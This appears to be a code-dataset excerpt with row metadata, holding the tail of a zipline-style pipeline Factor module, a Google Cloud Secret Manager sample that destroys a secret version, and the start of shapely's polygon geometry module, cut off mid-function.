        # Comparisons are only defined between like-typed factors.
        raise TypeError(
            "Don't know how to compute {left} {op} {right}.\n"
            "Comparisons are only supported between Factors of equal "
            "dtypes.".format(left=left, op=op, right=right)
        )
    if not comparison and not (left == float64_dtype and right == float64_dtype):
        # Arithmetic requires both operands to already be float64.
        raise TypeError(
            "Don't know how to compute {left} {op} {right}.\n"
            "Arithmetic operators are only supported between Factors of "
            "dtype 'float64'.".format(
                left=left.name,
                op=op,
                right=right.name,
            )
        )
    return bool_dtype if comparison else float64_dtype
def binary_operator(op):
    """
    Factory function for making binary operator methods on a Factor subclass.
    Returns a function, "binary_operator" suitable for implementing functions
    like __add__.
    """
    # When combining a Factor with a NumericalExpression, we use this
    # attrgetter instance to defer to the commuted implementation of the
    # NumericalExpression operator.
    commuted_method_getter = attrgetter(method_name_for_op(op, commute=True))
    @with_doc("Binary Operator: '%s'" % op)
    @with_name(method_name_for_op(op))
    @coerce_numbers_to_my_dtype
    def binary_operator(self, other):
        # This can't be hoisted up a scope because the types returned by
        # binop_return_type aren't defined when the top-level function is
        # invoked in the class body of Factor.
        return_type = binop_return_type(op)
        if isinstance(self, NumExprFactor):
            # Merge `other` into our existing expression tree.
            self_expr, other_expr, new_inputs = self.build_binary_op(
                op, other,
            )
            return return_type(
                "({left}) {op} ({right})".format(
                    left=self_expr,
                    op=op,
                    right=other_expr,
                ),
                new_inputs,
                dtype=binop_return_dtype(op, self.dtype, other.dtype),
            )
        elif isinstance(other, NumExprFactor):
            # NumericalExpression overrides ops to correctly handle merging of
            # inputs. Look up and call the appropriate reflected operator with
            # ourself as the input.
            return commuted_method_getter(other)(self)
        elif isinstance(other, Term):
            if self is other:
                # `x op x` binds the shared input once as x_0.
                return return_type(
                    "x_0 {op} x_0".format(op=op),
                    (self,),
                    dtype=binop_return_dtype(op, self.dtype, other.dtype),
                )
            return return_type(
                "x_0 {op} x_1".format(op=op),
                (self, other),
                dtype=binop_return_dtype(op, self.dtype, other.dtype),
            )
        elif isinstance(other, Number):
            return return_type(
                "x_0 {op} ({constant})".format(op=op, constant=other),
                binds=(self,),
                # .dtype access is safe here because coerce_numbers_to_my_dtype
                # will convert any input numbers to numpy equivalents.
                dtype=binop_return_dtype(op, self.dtype, other.dtype)
            )
        raise BadBinaryOperator(op, self, other)
    return binary_operator
def reflected_binary_operator(op):
    """
    Factory function for making binary operator methods on a Factor.
    Returns a function, "reflected_binary_operator" suitable for implementing
    functions like __radd__.
    """
    # Comparisons never need reflected implementations here.
    assert not is_comparison(op)
    @with_name(method_name_for_op(op, commute=True))
    @coerce_numbers_to_my_dtype
    def reflected_binary_operator(self, other):
        if isinstance(self, NumericalExpression):
            # Merge `other` into our tree; operands are swapped relative to
            # the forward operator because we are the right-hand side.
            self_expr, other_expr, new_inputs = self.build_binary_op(
                op, other
            )
            return NumExprFactor(
                "({left}) {op} ({right})".format(
                    left=other_expr,
                    right=self_expr,
                    op=op,
                ),
                new_inputs,
                dtype=binop_return_dtype(op, other.dtype, self.dtype)
            )
        # Only have to handle the numeric case because in all other valid
        # cases the corresponding left-binding method will be called.
        elif isinstance(other, Number):
            return NumExprFactor(
                "{constant} {op} x_0".format(op=op, constant=other),
                binds=(self,),
                dtype=binop_return_dtype(op, other.dtype, self.dtype),
            )
        raise BadBinaryOperator(op, other, self)
    return reflected_binary_operator
def unary_operator(op):
    """
    Factory function for making unary operator methods for Factors.
    """
    # Only negate is currently supported.
    valid_ops = {'-'}
    if op not in valid_ops:
        raise ValueError("Invalid unary operator %s." % op)
    @with_doc("Unary Operator: '%s'" % op)
    @with_name(unary_op_name(op))
    def unary_operator(self):
        if self.dtype != float64_dtype:
            raise TypeError(
                "Can't apply unary operator {op!r} to instance of "
                "{typename!r} with dtype {dtypename!r}.\n"
                "{op!r} is only supported for Factors of dtype "
                "'float64'.".format(
                    op=op,
                    typename=type(self).__name__,
                    dtypename=self.dtype.name,
                )
            )
        # This can't be hoisted up a scope because the types returned by
        # unary_op_return_type aren't defined when the top-level function is
        # invoked.
        if isinstance(self, NumericalExpression):
            # Wrap our existing expression tree in the unary op.
            return NumExprFactor(
                "{op}({expr})".format(op=op, expr=self._expr),
                self.inputs,
                dtype=float64_dtype,
            )
        else:
            # Plain term: bind it as x_0 in a fresh expression.
            return NumExprFactor(
                "{op}x_0".format(op=op),
                (self,),
                dtype=float64_dtype,
            )
    return unary_operator
def function_application(func):
    """
    Factory function for producing function application methods for Factor
    subclasses (e.g. ``factor.log()``), backed by the numexpr math
    functions listed in NUMEXPR_MATH_FUNCS.
    """
    if func not in NUMEXPR_MATH_FUNCS:
        raise ValueError("Unsupported mathematical function '%s'" % func)
    @with_name(func)
    def mathfunc(self):
        if isinstance(self, NumericalExpression):
            # Compose with the existing expression instead of nesting
            # NumericalExpressions.
            return NumExprFactor(
                "{func}({expr})".format(func=func, expr=self._expr),
                self.inputs,
                dtype=float64_dtype,
            )
        else:
            return NumExprFactor(
                "{func}(x_0)".format(func=func),
                (self,),
                dtype=float64_dtype,
            )
    return mathfunc
def restrict_to_dtype(dtype, message_template):
    """
    A factory for decorators that restrict Factor methods to only be
    callable on Factors with a specific dtype.

    ``message_template`` is formatted with ``method_name``,
    ``expected_dtype`` and ``received_dtype`` when the check fails.
    """
    def processor(factor_method, _, factor_instance):
        factor_dtype = factor_instance.dtype
        if factor_dtype != dtype:
            raise TypeError(
                message_template.format(
                    method_name=factor_method.__name__,
                    expected_dtype=dtype.name,
                    received_dtype=factor_dtype,
                )
            )
        return factor_instance
    # `preprocess` applies the check to `self` before the method body runs.
    return preprocess(self=processor)
# Decorators for Factor methods.
# This variant's error message points callers at isnull()/notnull() for
# handling missing data.
if_not_float64_tell_caller_to_use_isnull = restrict_to_dtype(
    dtype=float64_dtype,
    message_template=(
        "{method_name}() was called on a factor of dtype {received_dtype}.\n"
        "{method_name}() is only defined for dtype {expected_dtype}."
        "To filter missing data, use isnull() or notnull()."
    )
)
# Generic float64-only restriction for numerical transforms.
float64_only = restrict_to_dtype(
    dtype=float64_dtype,
    message_template=(
        "{method_name}() is only defined on Factors of dtype {expected_dtype},"
        " but it was called on a Factor of dtype {received_dtype}."
    )
)
# The complete set of dtypes a Factor is allowed to have.
FACTOR_DTYPES = frozenset([datetime64ns_dtype, float64_dtype, int64_dtype])
class Factor(RestrictedDTypeMixin, ComputableTerm):
    """
    Pipeline API expression producing a numerically-valued output.

    Arithmetic/comparison operators and numexpr math functions are
    attached to this class dynamically via the ``clsdict.update`` calls in
    the class body below.
    """
    ALLOWED_DTYPES = FACTOR_DTYPES  # Used by RestrictedDTypeMixin
    # Dynamically add functions for creating NumExprFactor/NumExprFilter
    # instances.
    clsdict = locals()
    clsdict.update(
        {
            method_name_for_op(op): binary_operator(op)
            # Don't override __eq__ because it breaks comparisons on tuples of
            # Factors; `==` is exposed as the named method `eq` below instead.
            for op in MATH_BINOPS.union(COMPARISONS - {'=='})
        }
    )
    clsdict.update(
        {
            method_name_for_op(op, commute=True): reflected_binary_operator(op)
            for op in MATH_BINOPS
        }
    )
    clsdict.update(
        {
            unary_op_name(op): unary_operator(op)
            for op in UNARY_OPS
        }
    )
    clsdict.update(
        {
            funcname: function_application(funcname)
            for funcname in NUMEXPR_MATH_FUNCS
        }
    )
    # True division reuses the implementations generated for __div__/__rdiv__.
    __truediv__ = clsdict['__div__']
    __rtruediv__ = clsdict['__rdiv__']
    eq = binary_operator('==')
    @expect_types(
        mask=(Filter, NotSpecifiedType),
        groupby=(Classifier, NotSpecifiedType),
    )
    @float64_only
    def demean(self, mask=NotSpecified, groupby=NotSpecified):
        """
        Construct a Factor that computes ``self`` and subtracts the
        row-wise mean, optionally restricted by ``mask`` and grouped by
        ``groupby``.
        """
        def demean(row):
            return row - nanmean(row)
        return GroupedRowTransform(
            transform=demean,
            factor=self,
            mask=mask,
            groupby=groupby,
        )
    @expect_types(
        mask=(Filter, NotSpecifiedType),
        groupby=(Classifier, NotSpecifiedType),
    )
    @float64_only
    def zscore(self, mask=NotSpecified, groupby=NotSpecified):
        """
        Construct a Factor that Z-scores each row of ``self`` (subtract
        the mean, divide by the standard deviation), optionally restricted
        by ``mask`` and grouped by ``groupby``.
        """
        def zscore(row):
            return (row - nanmean(row)) / nanstd(row)
        return GroupedRowTransform(
            transform=zscore,
            factor=self,
            mask=mask,
            groupby=groupby,
        )
    def rank(self, method='ordinal', ascending=True, mask=NotSpecified):
        """
        Construct a new Factor representing the row-wise rank of ``self``.

        ``method`` must be one of the methods accepted by ``Rank`` (see
        ``_RANK_METHODS``).
        """
        return Rank(self, method=method, ascending=ascending, mask=mask)
    @expect_types(bins=int, mask=(Filter, NotSpecifiedType))
    def quantiles(self, bins, mask=NotSpecified):
        """
        Construct a term bucketing each row of ``self`` into ``bins``
        quantile labels.
        """
        if mask is NotSpecified:
            mask = self.mask
        return Quantiles(inputs=(self,), bins=bins, mask=mask)
    @expect_types(mask=(Filter, NotSpecifiedType))
    def quartiles(self, mask=NotSpecified):
        """Shorthand for ``quantiles(bins=4)``."""
        return self.quantiles(bins=4, mask=mask)
    @expect_types(mask=(Filter, NotSpecifiedType))
    def quintiles(self, mask=NotSpecified):
        """Shorthand for ``quantiles(bins=5)``."""
        return self.quantiles(bins=5, mask=mask)
    @expect_types(mask=(Filter, NotSpecifiedType))
    def deciles(self, mask=NotSpecified):
        """Shorthand for ``quantiles(bins=10)``."""
        return self.quantiles(bins=10, mask=mask)
    def top(self, N, mask=NotSpecified):
        """Construct a term matching the top N values of self each row."""
        return self.rank(ascending=False, mask=mask) <= N
    def bottom(self, N, mask=NotSpecified):
        """Construct a term matching the bottom N values of self each row."""
        return self.rank(ascending=True, mask=mask) <= N
    def percentile_between(self,
                           min_percentile,
                           max_percentile,
                           mask=NotSpecified):
        """
        Construct a filter matching values of self that fall between the
        given percentile bounds.
        """
        return PercentileFilter(
            self,
            min_percentile=min_percentile,
            max_percentile=max_percentile,
            mask=mask,
        )
    def isnull(self):
        """
        A filter producing True for values of self that are missing.

        For float64 factors "missing" means NaN; for other dtypes the
        check is delegated to NullFilter.
        """
        if self.dtype == float64_dtype:
            return self.isnan()
        else:
            return NullFilter(self)
    def notnull(self):
        """A filter producing True for values of self that are NOT missing."""
        return ~self.isnull()
    @if_not_float64_tell_caller_to_use_isnull
    def isnan(self):
        """A filter producing True for all NaN values of self."""
        # NaN is the only value not equal to itself.
        return self != self
    @if_not_float64_tell_caller_to_use_isnull
    def notnan(self):
        """A filter producing True for all non-NaN values of self."""
        return ~self.isnan()
    @if_not_float64_tell_caller_to_use_isnull
    def isfinite(self):
        """A filter producing True for values that are neither NaN nor infinite."""
        return (-inf < self) & (self < inf)
class NumExprFactor(NumericalExpression, Factor):
    """
    Factor backed by a numexpr expression string.

    Instances are constructed by the operator-overload factories above
    rather than directly by users.
    """
    pass
class GroupedRowTransform(Factor):
    """
    A Factor that applies a row-wise ``transform`` to the data of another
    factor, within groups defined by a classifier.

    Constructed by ``Factor.demean`` and ``Factor.zscore``.
    """
    # A window_length of 0 means this term needs no trailing window of data.
    window_length = 0
    def __new__(cls, transform, factor, mask, groupby):
        if mask is NotSpecified:
            mask = factor.mask
        else:
            # Only consider cells passing both our mask and the factor's.
            mask = mask & factor.mask
        if groupby is NotSpecified:
            # Default: a single group containing everything under the mask.
            groupby = Everything(mask=mask)
        return super(GroupedRowTransform, cls).__new__(
            GroupedRowTransform,
            transform=transform,
            inputs=(factor, groupby),
            missing_value=factor.missing_value,
            mask=mask,
            dtype=factor.dtype,
        )
    def _init(self, transform, *args, **kwargs):
        self._transform = transform
        return super(GroupedRowTransform, self)._init(*args, **kwargs)
    @classmethod
    def static_identity(cls, transform, *args, **kwargs):
        # The transform function participates in the term's identity so
        # that distinct transforms don't collide with each other.
        return (
            super(GroupedRowTransform, cls).static_identity(*args, **kwargs),
            transform,
        )
    def _compute(self, arrays, dates, assets, mask):
        data = arrays[0]
        null_group_value = self.inputs[1].missing_value
        # Re-label masked-out cells with the classifier's missing value so
        # they're excluded from every real group.
        group_labels = where(
            mask,
            arrays[1],
            null_group_value,
        )
        # Apply the transform per (row, group); cells in the null group
        # get this term's missing_value.
        return where(
            group_labels != null_group_value,
            naive_grouped_rowwise_apply(
                data=data,
                group_labels=group_labels,
                func=self._transform,
            ),
            self.missing_value,
        )
    @property
    def transform_name(self):
        # Name of the wrapped transform function (e.g. 'demean').
        return self._transform.__name__
    def short_repr(self):
        return type(self).__name__ + '(%r)' % self.transform_name
class Rank(SingleInputMixin, Factor):
    """
    A Factor representing the row-wise rank of another factor.

    Normally constructed via ``Factor.rank``; ``method`` must be one of
    the keys of ``_RANK_METHODS``.
    """
    # No trailing window of data is required.
    window_length = 0
    # Ranks are always floats, regardless of the input's dtype.
    dtype = float64_dtype
    def __new__(cls, factor, method, ascending, mask):
        return super(Rank, cls).__new__(
            cls,
            inputs=(factor,),
            method=method,
            ascending=ascending,
            mask=mask,
        )
    def _init(self, method, ascending, *args, **kwargs):
        self._method = method
        self._ascending = ascending
        return super(Rank, self)._init(*args, **kwargs)
    @classmethod
    def static_identity(cls, method, ascending, *args, **kwargs):
        # method/ascending participate in the term's identity so distinct
        # rankings don't collide with each other.
        return (
            super(Rank, cls).static_identity(*args, **kwargs),
            method,
            ascending,
        )
    def _validate(self):
        """
        Verify that the stored rank method is valid.
        """
        if self._method not in _RANK_METHODS:
            raise UnknownRankMethod(
                method=self._method,
                choices=set(_RANK_METHODS),
            )
        return super(Rank, self)._validate()
    def _compute(self, arrays, dates, assets, mask):
        """
        For each row in the input, compute a like-shaped array of per-row
        ranks.
        """
        return masked_rankdata_2d(
            arrays[0],
            mask,
            self.inputs[0].missing_value,
            self._method,
            self._ascending,
        )
    def __repr__(self):
        return "{type}({input_}, method='{method}', mask={mask})".format(
            type=type(self).__name__,
            input_=self.inputs[0],
            method=self._method,
            mask=self.mask,
        )
class CustomFactor(PositiveWindowLengthMixin, CustomTermMixin, Factor):
    """
    Base class for user-defined Factors operating on a positive-length
    trailing window of data.
    """
    # Default output dtype.
    dtype = float64_dtype
class Latest(LatestMixin, CustomFactor):
    """
    Factor producing the most recent value of its input each day.
    """
    # Only the single most recent row of data is needed.
    window_length = 1
    def compute(self, today, assets, out, data):
        # Copy the last (most recent) row of the window into the output.
        out[:] = data[-1]
| true
| true
|
f705417d19cb9869018feb9f86bc6330c83dbbeb
| 1,953
|
py
|
Python
|
secretmanager/api-client/destroy_secret_version.py
|
m-abba/python-docs-samples
|
b00f00d734b89edae8ae6876d6261e19dc82cd34
|
[
"Apache-2.0"
] | 1
|
2020-03-05T18:24:45.000Z
|
2020-03-05T18:24:45.000Z
|
secretmanager/api-client/destroy_secret_version.py
|
m-abba/python-docs-samples
|
b00f00d734b89edae8ae6876d6261e19dc82cd34
|
[
"Apache-2.0"
] | 1
|
2022-01-14T23:28:27.000Z
|
2022-01-14T23:28:27.000Z
|
secretmanager/api-client/destroy_secret_version.py
|
m-abba/python-docs-samples
|
b00f00d734b89edae8ae6876d6261e19dc82cd34
|
[
"Apache-2.0"
] | 2
|
2020-06-07T07:03:00.000Z
|
2021-04-10T18:22:25.000Z
|
#!/usr/bin/env python
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
"""
command line application and sample code for destroying a secret verison.
"""
import argparse
# [START secretmanager_destroy_secret_version]
def destroy_secret_version(project_id, secret_id, version_id):
    """
    Destroy the given secret version, making the payload irrecoverable. Other
    secrets versions are unaffected.
    """
    # Import the Secret Manager client library inside the function so the
    # sample stays self-contained.
    from google.cloud import secretmanager_v1beta1 as secretmanager

    # Create the Secret Manager client.
    client = secretmanager.SecretManagerServiceClient()

    # Fully-qualified resource name of the version to destroy.
    version_name = client.secret_version_path(project_id, secret_id, version_id)

    # Request destruction; the returned version reflects the new state.
    destroyed = client.destroy_secret_version(version_name)
    print('Destroyed secret version: {}'.format(destroyed.name))
    return destroyed
if __name__ == '__main__':
    # Parse the three positional arguments and run the sample.
    parser = argparse.ArgumentParser(
        description=__doc__,
        formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument('project_id', help='id of the GCP project')
    parser.add_argument('secret_id', help='id of the secret from which to act')
    parser.add_argument('version_id', help='id of the version to destroy')
    args = parser.parse_args()
    destroy_secret_version(args.project_id, args.secret_id, args.version_id)
| 34.263158
| 79
| 0.752176
|
import argparse
def destroy_secret_version(project_id, secret_id, version_id):
from google.cloud import secretmanager_v1beta1 as secretmanager
client = secretmanager.SecretManagerServiceClient()
name = client.secret_version_path(project_id, secret_id, version_id)
response = client.destroy_secret_version(name)
print('Destroyed secret version: {}'.format(response.name))
return response
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('project_id', help='id of the GCP project')
parser.add_argument('secret_id', help='id of the secret from which to act')
parser.add_argument('version_id', help='id of the version to destroy')
args = parser.parse_args()
destroy_secret_version(args.project_id, args.secret_id, args.version_id)
| true
| true
|
f70541cbb5540d0c4d4bcc2d81b9b62daf4c08a3
| 13,756
|
py
|
Python
|
shapely/geometry/polygon.py
|
tsauerwein/shapely
|
d0bdd5f99cc8be9ce6a1022ff971fbd5deff2dad
|
[
"BSD-3-Clause"
] | null | null | null |
shapely/geometry/polygon.py
|
tsauerwein/shapely
|
d0bdd5f99cc8be9ce6a1022ff971fbd5deff2dad
|
[
"BSD-3-Clause"
] | null | null | null |
shapely/geometry/polygon.py
|
tsauerwein/shapely
|
d0bdd5f99cc8be9ce6a1022ff971fbd5deff2dad
|
[
"BSD-3-Clause"
] | null | null | null |
"""Polygons and their linear ring components
"""
from ctypes import c_double, c_void_p, cast, POINTER
from ctypes import ArgumentError
import weakref
from shapely.algorithms.cga import signed_area
from shapely.coords import required
from shapely.geos import lgeos
from shapely.geometry.base import BaseGeometry
from shapely.geometry.linestring import LineString, LineStringAdapter
from shapely.geometry.proxy import PolygonProxy
__all__ = ['Polygon', 'asPolygon', 'LinearRing', 'asLinearRing']
class LinearRing(LineString):
    """
    A closed one-dimensional feature comprising one or more line segments

    A LinearRing that crosses itself or touches itself at a single point is
    invalid and operations on it may fail.
    """
    def __init__(self, coordinates=None):
        """
        Parameters
        ----------
        coordinates : sequence
            A sequence of (x, y [,z]) numeric coordinate pairs or triples

        Rings are implicitly closed. There is no need to specify a final
        coordinate pair identical to the first.

        Example
        -------
        Construct a square ring.

          >>> ring = LinearRing( ((0, 0), (0, 1), (1 ,1 ), (1 , 0)) )
          >>> ring.is_closed
          True
          >>> ring.length
          4.0
        """
        BaseGeometry.__init__(self)
        if coordinates is not None:
            self._set_coords(coordinates)
    @property
    def __geo_interface__(self):
        # GeoJSON-like mapping of the ring.
        return {
            'type': 'LinearRing',
            'coordinates': tuple(self.coords)
        }
    # Coordinate access
    _get_coords = BaseGeometry._get_coords
    def _set_coords(self, coordinates):
        # Discard the current GEOS geometry and build a fresh linear ring.
        self.empty()
        self._geom, self._ndim = geos_linearring_from_py(coordinates)
    coords = property(_get_coords, _set_coords)
    @property
    def is_ccw(self):
        """True if the ring is oriented counter clock-wise"""
        return bool(self.impl['is_ccw'](self))
    @property
    def is_simple(self):
        """True if the geometry is simple, meaning that any self-intersections
        are only at boundary points, else False"""
        return LineString(self).is_simple
class LinearRingAdapter(LineStringAdapter):
    """Adapter presenting a coordinate-bearing context object (e.g. a list
    of tuples or an array-protocol object) through the LinearRing
    interface."""
    __p__ = None
    def __init__(self, context):
        self.context = context
        # Factory used to build GEOS geometries on demand from `context`.
        self.factory = geos_linearring_from_py
    @property
    def __geo_interface__(self):
        return {
            'type': 'LinearRing',
            'coordinates': tuple(self.coords)
        }
    # Read-only: adapters expose but do not own their coordinates.
    coords = property(BaseGeometry._get_coords)
def asLinearRing(context):
    """Adapt an object to the LinearRing interface"""
    adapter = LinearRingAdapter(context)
    return adapter
class InteriorRingSequence(object):
    """
    Lazy sequence of a polygon's interior rings (holes).

    Rings are materialized on demand from the parent polygon's GEOS
    geometry and held via weak references.
    """
    _factory = None
    _geom = None
    __p__ = None
    _ndim = None
    _index = 0
    _length = 0
    __rings__ = None
    _gtag = None
    def __init__(self, parent):
        self.__p__ = parent
        self._geom = parent._geom
        self._ndim = parent._ndim
    def __iter__(self):
        self._index = 0
        self._length = self.__len__()
        return self
    def next(self):
        if self._index < self._length:
            ring = self._get_ring(self._index)
            self._index += 1
            return ring
        else:
            raise StopIteration
    # Alias for the Python 3 iterator protocol; harmless under Python 2.
    __next__ = next
    def __len__(self):
        return lgeos.GEOSGetNumInteriorRings(self._geom)
    def __getitem__(self, key):
        m = self.__len__()
        if isinstance(key, int):
            if key + m < 0 or key >= m:
                raise IndexError("index out of range")
            if key < 0:
                i = m + key
            else:
                i = key
            return self._get_ring(i)
        elif isinstance(key, slice):
            res = []
            start, stop, stride = key.indices(m)
            for i in xrange(start, stop, stride):
                res.append(self._get_ring(i))
            return res
        else:
            raise TypeError("key must be an index or slice")
    @property
    def _longest(self):
        """Length of the longest ring's coordinate sequence.

        Bug fix: the computed maximum was previously discarded because the
        property had no return statement; it is now returned.
        """
        max = 0
        for g in iter(self):
            l = len(g.coords)
            if l > max:
                max = l
        return max
    def gtag(self):
        # Cheap state tag of the parent, used to invalidate the ring cache.
        return hash(repr(self.__p__))
    def _get_ring(self, i):
        gtag = self.gtag()
        if gtag != self._gtag:
            # NOTE(review): `self._gtag` is never assigned, so this branch
            # resets the cache on every call and each access builds a fresh
            # ring. Left as-is to preserve behavior; a cache fix would also
            # need to handle dead weakrefs below. Confirm intent upstream.
            self.__rings__ = {}
        if i not in self.__rings__:
            g = lgeos.GEOSGetInteriorRingN(self._geom, i)
            ring = LinearRing()
            ring.__geom__ = g
            ring.__p__ = self
            ring._owned = True
            ring._ndim = self._ndim
            self.__rings__[i] = weakref.ref(ring)
        return self.__rings__[i]()
class Polygon(BaseGeometry):
    """
    A two-dimensional figure bounded by a linear ring

    A polygon has a non-zero area. It may have one or more negative-space
    "holes" which are also bounded by linear rings. If any rings cross each
    other, the feature is invalid and operations on it may fail.

    Attributes
    ----------
    exterior : LinearRing
        The ring which bounds the positive space of the polygon.
    interiors : sequence
        A sequence of rings which bound all existing holes.
    """
    _exterior = None
    _interiors = []
    _ndim = 2
    def __init__(self, shell=None, holes=None):
        """
        Parameters
        ----------
        shell : sequence
            A sequence of (x, y [,z]) numeric coordinate pairs or triples
        holes : sequence
            A sequence of objects which satisfy the same requirements as the
            shell parameters above

        Example
        -------
        Create a square polygon with no holes

          >>> coords = ((0., 0.), (0., 1.), (1., 1.), (1., 0.), (0., 0.))
          >>> polygon = Polygon(coords)
          >>> polygon.area
          1.0
        """
        BaseGeometry.__init__(self)
        if shell is not None:
            self._geom, self._ndim = geos_polygon_from_py(shell, holes)
    @property
    def exterior(self):
        # Built lazily and cached through a weakref so the polygon does not
        # keep the derived ring object alive; rebuilt if the weakref died.
        if self.is_empty:
            return None
        elif self._exterior is None or self._exterior() is None:
            g = lgeos.GEOSGetExteriorRing(self._geom)
            ring = LinearRing()
            ring.__geom__ = g
            ring.__p__ = self
            ring._owned = True
            ring._ndim = self._ndim
            self._exterior = weakref.ref(ring)
        return self._exterior()
    @property
    def interiors(self):
        # Lazy view over the holes; empty polygons have none.
        if self.is_empty:
            return []
        return InteriorRingSequence(self)
    @property
    def ctypes(self):
        # Delegate ctypes data to the exterior ring, caching the result.
        if not self._ctypes_data:
            self._ctypes_data = self.exterior.ctypes
        return self._ctypes_data
    @property
    def __array_interface__(self):
        raise NotImplementedError(
            "A polygon does not itself provide the array interface. Its rings do.")
    def _get_coords(self):
        raise NotImplementedError(
            "Component rings have coordinate sequences, but the polygon does not")
    def _set_coords(self, ob):
        raise NotImplementedError(
            "Component rings have coordinate sequences, but the polygon does not")
    @property
    def coords(self):
        raise NotImplementedError(
            "Component rings have coordinate sequences, but the polygon does not")
    @property
    def __geo_interface__(self):
        # GeoJSON-like mapping: exterior first, then each hole.
        coords = [tuple(self.exterior.coords)]
        for hole in self.interiors:
            coords.append(tuple(hole.coords))
        return {
            'type': 'Polygon',
            'coordinates': tuple(coords)
        }
class PolygonAdapter(PolygonProxy, Polygon):
    """Adapter presenting shell/holes context objects through the Polygon
    interface."""
    def __init__(self, shell, holes=None):
        self.shell = shell
        self.holes = holes
        self.context = (shell, holes)
        # Factory used to build GEOS geometries on demand from `context`.
        self.factory = geos_polygon_from_py
    @property
    def _ndim(self):
        # Coordinate dimensionality (2 or 3), derived from the shell.
        try:
            # From array protocol
            array = self.shell.__array_interface__
            n = array['shape'][1]
            assert n == 2 or n == 3
            return n
        except AttributeError:
            # Fall back on list
            return len(self.shell[0])
def asPolygon(shell, holes=None):
    """Adapt objects to the Polygon interface"""
    adapter = PolygonAdapter(shell, holes)
    return adapter
def orient(polygon, sign=1.0):
    """Return a copy of `polygon` with consistently oriented rings.

    For the given `sign`, the result's exterior ring has signed area of
    that sign (counter-clockwise for positive sign) and every hole has
    the opposite sign. Rings already oriented correctly are reused;
    others are rebuilt from their reversed coordinates.
    """
    s = float(sign)
    exterior = polygon.exterior
    if signed_area(exterior) / s >= 0.0:
        shell = exterior
    else:
        shell = list(exterior.coords)[::-1]
    holes = []
    for hole in polygon.interiors:
        if signed_area(hole) / s <= 0.0:
            holes.append(hole)
        else:
            holes.append(list(hole.coords)[::-1])
    return Polygon(shell, holes)
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
    """Build a GEOS linear ring from a Python coordinate source.

    `ob` may expose the numpy array interface or be a sequence of
    (x, y[, z]) tuples. Returns a (GEOS geometry pointer, ndim) tuple,
    or None when updating an existing geometry in place via
    `update_geom`/`update_ndim`. A closing coordinate equal to the first
    is appended automatically when missing.
    """
    # If numpy is present, we use numpy.require to ensure that we have a
    # C-continguous array that owns its data. View data will be copied.
    ob = required(ob)
    try:
        # From array protocol
        array = ob.__array_interface__
        assert len(array['shape']) == 2
        m = array['shape'][0]
        n = array['shape'][1]
        if m < 3:
            raise ValueError(
                "A LinearRing must have at least 3 coordinate tuples")
        assert n == 2 or n == 3
        # Make pointer to the coordinate array
        if isinstance(array['data'], tuple):
            # numpy tuple (addr, read-only)
            cp = cast(array['data'][0], POINTER(c_double))
        else:
            cp = array['data']
        # Add closing coordinates to sequence?
        # (Compare first and last points; reserve one extra slot if open.)
        if cp[0] != cp[m*n-n] or cp[1] != cp[m*n-n+1]:
            M = m + 1
        else:
            M = m
        # Create a coordinate sequence
        if update_geom is not None:
            cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
            if n != update_ndim:
                raise ValueError(
                "Wrong coordinate dimensions; this geometry has dimensions: %d" \
                % update_ndim)
        else:
            cs = lgeos.GEOSCoordSeq_create(M, n)
        # add to coordinate sequence
        for i in xrange(m):
            # Because of a bug in the GEOS C API,
            # always set X before Y
            lgeos.GEOSCoordSeq_setX(cs, i, cp[n*i])
            lgeos.GEOSCoordSeq_setY(cs, i, cp[n*i+1])
            if n == 3:
                lgeos.GEOSCoordSeq_setZ(cs, i, cp[n*i+2])
        # Add closing coordinates to sequence?
        if M > m:
            # Because of a bug in the GEOS C API,
            # always set X before Y
            lgeos.GEOSCoordSeq_setX(cs, M-1, cp[0])
            lgeos.GEOSCoordSeq_setY(cs, M-1, cp[1])
            if n == 3:
                lgeos.GEOSCoordSeq_setZ(cs, M-1, cp[2])
    except AttributeError:
        # Fall back on list
        m = len(ob)
        n = len(ob[0])
        if m < 3:
            raise ValueError(
                "A LinearRing must have at least 3 coordinate tuples")
        assert (n == 2 or n == 3)
        # Add closing coordinates if not provided
        if m == 3 or ob[0][0] != ob[-1][0] or ob[0][1] != ob[-1][1]:
            M = m + 1
        else:
            M = m
        # Create a coordinate sequence
        if update_geom is not None:
            cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
            if n != update_ndim:
                raise ValueError(
                "Wrong coordinate dimensions; this geometry has dimensions: %d" \
                % update_ndim)
        else:
            cs = lgeos.GEOSCoordSeq_create(M, n)
        # add to coordinate sequence
        for i in xrange(m):
            coords = ob[i]
            # Because of a bug in the GEOS C API,
            # always set X before Y
            lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
            lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
            if n == 3:
                try:
                    lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
                except IndexError:
                    raise ValueError("Inconsistent coordinate dimensionality")
        # Add closing coordinates to sequence?
        if M > m:
            coords = ob[0]
            # Because of a bug in the GEOS C API,
            # always set X before Y
            lgeos.GEOSCoordSeq_setX(cs, M-1, coords[0])
            lgeos.GEOSCoordSeq_setY(cs, M-1, coords[1])
            if n == 3:
                lgeos.GEOSCoordSeq_setZ(cs, M-1, coords[2])
    if update_geom is not None:
        return None
    else:
        return lgeos.GEOSGeom_createLinearRing(cs), n
def update_linearring_from_py(geom, ob):
    # Overwrite `geom`'s coordinate sequence in place with coords from `ob`.
    geos_linearring_from_py(ob, geom._geom, geom._ndim)
def geos_polygon_from_py(shell, holes=None):
    """Build a GEOS polygon from shell and hole coordinate sequences.

    Returns a (GEOS geometry pointer, ndim) tuple.
    """
    # NOTE(review): if `shell` is None, `geos_shell` and `ndim` are never
    # bound and the construction below raises NameError — callers appear to
    # always pass a shell; confirm before relying on a None shell.
    if shell is not None:
        geos_shell, ndim = geos_linearring_from_py(shell)
    if holes:
        ob = holes
        L = len(ob)
        exemplar = ob[0]
        try:
            N = len(exemplar[0])
